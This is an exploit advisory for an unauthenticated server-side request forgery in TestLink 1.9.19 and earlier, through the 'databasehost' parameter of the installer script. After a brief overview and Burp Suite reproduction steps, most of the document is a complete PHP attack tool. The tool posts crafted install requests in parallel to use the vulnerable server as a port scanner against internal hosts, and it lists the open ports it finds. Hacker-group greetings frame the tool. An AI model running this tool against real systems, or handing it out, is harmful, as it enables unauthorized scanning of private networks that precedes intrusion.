TestLink versions 1.9.19 and below suffers from a server side request forgery vulnerability.
671a64f681314d0d390da608a907ce79##################################################################################################
#Exploit Title : TestLink (version <= 1.9.19) Server Side Request Forgery
#Author : Manish Kishan Tanwar AKA error1046
#Vendor Link : http://testlink.org
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################
/////////////////////////
//Vulnerability OverView
/////////////////////////
TestLink (version <= 1.9.19) is vulnerable to Un-Autheticated Server-Side Request Forgery (SSRF) which allow an attacker to perform Network device Port
scanning. Device may be the same which is hosting Testlink code or it may be connected to the same network.
This issue exists in script "install/installNewDB.php" and affected parameter is "databasehost".
Steps to Reproduce:
===================
1. Configure your web browser with any proxy software (i am using Burp Suite).
2. Access below mentioned URL in web browser and click "Continue" button:
http://localhost/testlink-1.9.19/install/installCheck.php?licenseOK=on
3. Turn on Burp Interception.
4. Now, in web browser, fill relevant information in input fields (Database admin login/Password etc) and click "Process TestLink Setup" button.
5. In Burp proxy, send the intercepted request to Burp Repeater tab by pressing "CTRL+R" key combination.
6. Switch to Burp Repeater tab and change the value of HTTP Post Parameter "databasehost" from "localhost" to "localhost:22" (if your machine is Linux and SSH running on it), click "Go" button in Burp Repeater.
7. Application response will appear in Burp repeater response tab, which will beshowing that "MySQL server has gone away".
8. Now, change the value of "databasehost" from "localhost:22" to "localhost:1337", click "Go" button in Burp Repeater.
9. Application will respond with HTTP response having SQL server error message "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond".
//////////////////////////
//Exploit code starts here
//////////////////////////
<?php
set_time_limit(0);
/*coded by Manish Kishan Tanwar @indishell lab (http://mannulinux.org) */
$head = '
<html>
<head>
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
</script>
<title>--==[[Indishell forever]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
background: url("https://raw.githubusercontent.com/incredibleindishell/sqlite-lab/master/images/head.jpg");
background-size: 100% 700px;
font-family: Tahoma;
color: white;
}
input {
border : solid 2px ;
border-color : black;
BACKGROUND-COLOR: #444444;
font: 8pt Verdana;
color: white;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
#t input[type=\'submit\']{
COLOR: White;
border:none;
BACKGROUND-COLOR: black;
}
#t input[type=\'submit\']:hover {
BACKGROUND-COLOR: #ff9933;
color: black;
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 0px ;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 2px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #191919;;
color: #FFF;
}
textarea {
border : dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
A:link {
border: 1px;
COLOR: red; TEXT-DECORATION: none
}
A:visited {
COLOR: red; TEXT-DECORATION: none
}
A:hover {
color: White; TEXT-DECORATION: none
}
A:active {
color: white; TEXT-DECORATION: none
}
</STYLE>
<script type="text/javascript">
<!--
function lhook(id) {
var e = document.getElementById(id);
if(e.style.display == \'block\')
e.style.display = \'none\';
else
e.style.display = \'block\';
}
//-->
</script>
';
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ TestLink </font><font color=white size=5 face="comic sans ms"><b>SSRF </font><font color=green size=5 face="comic sans ms"><b> Exploit POC]]==--</font><br>
<font color=#ff9933 size=3 face="comic sans ms"><b>--==[[ With </font><font color=white size=3 face="comic sans ms"><b>Love From IndiShell</font><font color=green size=3 face="comic sans ms"><b> Crew]]==--</font>
<div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
-==[[Greetz to]]==--</font><br> <font color=#ff9933>zero cool, code breaker ica, root_devil, google_warrior,INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, ethicalnoob Indishell, cyber warrior, Anurag, Hacker Fantastic and rest of TEAM INDISHELL<br>
<font color=white>--==[[Love to]]==--</font><br># My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Jagriti, Hardeep Singh, Ashu bhai ji, Rafay Baloch, Soldier Of God, Shafoon, Rehan Manzoor, almas malik, Bhuppi, Mohit, Ffe ^_^, Govind Singh, Shardhanand, Budhaoo, Don(Deepika kaushik) and D3 <br>
<b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
</table>
</table> <br>
';
?>
<div align=center>
<table width="60%" cellspacing="0" cellpadding="0" class="tb1" style="border: 0px; background-color: transparent; ">
<tr><td width="80%" align=center style="padding: 10px; background-color: #191919; opacity: 0.6;">
<form method="POST" >
Target URL: <input style="width: 200px;" type=text name=url value="http://target/testlink_base_dir/">
<br><br>
Ports to be scan: <input type=text name=ports value="21,445,1433,3389">
   
Host to be scan: <input type=text name=host value="Host or IP">
</td></tr><tr>
<td width="40%" align=center style="padding: 10px;">
<input type="submit" value="Billu, Spread the magic" name="own_it"/></form>
</td></tr></table>
<?php
function bas_jugad($lu,$host,$p0rt,$timeout)
{
$payload="isNew=1&databasetype=mysql&databasehost=$host:$p0rt&databasename=testlink3&tableprefix=box3&databaseloginname=indishell&databaseloginpassword=tost&tl_loginname=root&tl_loginpassword=";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "$payload");
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$result = curl_exec ($ch);
curl_close ($ch);
return $result;
}
if(isset($_POST['own_it']))
{
$url_auth=trim($_POST['url']).'/install/installNewDB.php';
$list=$_POST['ports'];
$h0st=trim($_POST['host']);
///////////////////////////////
///Check if host is up or not
///////////////////////////////
$test_port = '31337';
$t_out='100';
$check = bas_jugad($url_auth,$h0st,$test_port,$t_out);
//print_r(strstr($check,'php_network_getaddresses'));
if(!(strstr($check,'php_network_getaddresses'))=='')
{
echo "<script>alert('Target is unreachable, Get me something working :|');</script><br>";
die();
}
////////////////////////////
///Time to get back to work
///////////////////////////
else
{
echo "<script>alert('Target is reachable, I am rolling out =)) ');</script><br>";
if(!(strstr($list,","))=='')
{
$all_ports=array();
$ch = array();
$content = array();
$open = array();
$closed = array();
$all_ports=explode(',',$list);
$n_time='5';
$t1 = microtime(true);
$mh = curl_multi_init();
$i = 0;
foreach($all_ports as $port)
{
$payload="isNew=1&databasetype=mysql&databasehost=$h0st:$port&databasename=testlink3&tableprefix=box3&databaseloginname=indishell&databaseloginpassword=tost&tl_loginname=root&tl_loginpassword=";
$ch[$i] = curl_init();
curl_setopt($ch[$i], CURLOPT_URL, $url_auth);
curl_setopt($ch[$i], CURLOPT_HEADER, 0);
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 5);
curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch[$i], CURLOPT_POST, 1);
curl_setopt($ch[$i], CURLOPT_POSTFIELDS, $payload);
curl_multi_add_handle($mh, $ch[$i]);
$i ++;
}
$active = null;
do
{
$mrc = curl_multi_exec($mh, $active);
usleep(200000); // limit requests for a while
} while ($active);
$i = 0;
foreach ($ch AS $i => $c)
{
$content[$i] = curl_multi_getcontent($c);
curl_multi_remove_handle($mh, $c);
}
curl_multi_close($mh);
for($j=0;$j < count($content);$j++)
{
if(!(strstr($content[$j],'refused'))=='')
{
// echo "Port $all_ports[$j] is closed<br>";
}
else
{
//echo "port $all_ports[$j] is open 8-)<br>";
array_push($open,$all_ports[$j]);
}
}
echo '<table width="50%" cellspacing="0" cellpadding="0" class="tb1" >
<tr><td align=center style="padding: 10px; background-color: black; opacity: 0.9;"><font color=#ff9933>--==[[ Open Ports on Target server '.$h0st.' ]]==--</font></td></tr>';
foreach($open as $in_open)
{
echo '<tr><td align=center style="padding: 3px; background-color: black; opacity: 0.9;"><font color="white">Port '.$in_open.'</font></td></tr>';
}
echo '</table>';
}
else
{
}
}
}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">Developed By 1046 at <font color=#ff9933>IndiShell Lab</font>";
?>
/////////////////////
//Exploit code end
/////////////////////
--==[[ Greetz To ]]==--
Guru ji zero, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba,
Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad,
Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256
Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, Bikash Dash
--==[[Love to]]==--
My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP
Mohit, Ffe, Shardhanand, Budhaoo, Jagriti, Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)